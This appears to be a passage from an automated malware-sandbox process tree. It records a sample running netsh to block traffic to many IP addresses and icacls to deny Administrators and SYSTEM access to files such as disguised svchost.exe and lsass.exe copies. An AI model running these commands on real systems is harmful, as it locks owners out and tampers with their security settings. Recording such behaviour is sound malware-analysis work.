                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                          PID:1160
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2032
                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                            PID:3036
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                              netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                              PID:864
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1592
                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:2984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1504
                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2392
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                                    PID:1560
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3060
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                      netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:988
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:912
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                        PID:2296
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:772
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                          netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                          PID:2972
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2576
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2848
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                              netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                              PID:2736
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:2740
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                PID:2776
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:2812
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                  PID:296
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2864
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                    PID:2664
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1564
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:936
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:2132
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:2212
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1416
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:1572
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:108
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:2688
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:1980
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:316
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1808
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:848
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      PID:2308
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:2092
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1140
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2896
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:2120
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:2172
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1940
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:1448
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:864
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls C:\Windows\java.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:272
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:2984
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls C:\Windows\java.exe /deny System:(F)
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:2540
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:2288
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls C:\Windows\java.exe /deny система:(F)
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:2944
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:2504
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2300
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1680
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:2544
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:324
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                    icacls c:\windows\svchost.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                    PID:276
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:3064
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls c:\windows\svchost.exe /deny System:(F)
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:2892
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:2604
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls c:\windows\svchost.exe /deny система:(F)
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:1504
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                              PID:2924
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                            PID:2020
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:2792
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                  icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      PID:2740
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:2672
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                        icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        PID:1292
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:2228
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                          icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                            PID:2584
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:296
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                            PID:268
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:1328
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                              icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:1972
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                              PID:2900
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                PID:1564
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:2472
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                  icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                  PID:2132
